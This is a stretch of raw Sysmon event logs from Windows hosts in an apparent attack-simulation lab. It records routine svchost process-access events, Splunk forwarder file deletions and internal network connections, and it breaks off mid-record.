10341000x8000000000000000300467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.831{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000300442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:55.747{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931895091901533171F9E477FDD2F5C6,SHA256=5780ACEF1CFBB1A74D75052941EC4AB653F12E9343FB1FE278A7C38986FAE582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:55.144{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B11C087AB12B88DEE3723DFA844E456,SHA256=9E5C2F9291C408D58130A091D58F106FD3D90BDB3A659AD4BB2544996ECAD034,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:53.504{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58966-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000224241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:53.666{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51837-false10.0.1.12-8000- 23542300x8000000000000000224240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:56.269{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A94A9D96E80A7962A0FADAB5501271D1,SHA256=4F214C6C8DA377A3AAA4D081C728960515B5263172C28F7B06F3A65B70B600EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:56.462{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=2A9BA307886FC8E22E51D30D3E10A7B7,SHA256=7969DF161CD6D78A43E91D0ED98C72C14A9066EFD45C96EB665061A9F188FBDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:57.209{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E944C894735AB1D765E96BE70D7911,SHA256=581153D8595E015CE5028221E138EBC86277AF42E48D2A0FD69BF235F71AABA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:57.285{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717B5AD1216D0ABD2F12CE195E9A2AA6,SHA256=8ECD9362022101833CF22435731A03C93E68ADFE3DAFDF903C1438BA21747505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:58.245{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F1F6663F2C74F7D4C9ADB0EAB6BEA34,SHA256=4BAD3C9C31E9A2E278F7B596DE81D76C77100B861FF6F20DEF026F8C67D3BF04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:58.301{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77906635E0F1DB8C05480524A04F24E8,SHA256=A0CBFB6529DCED0964D26229A42A34952449AC33F082489364BA8ADAA1BE6BF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:59.347{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=371C2CAABE2ADB2490911B5B245B0715,SHA256=4DBE59D17633B6A1DF92E212100F622665ED11410E71ED30B006F87C5778F566,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:59.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 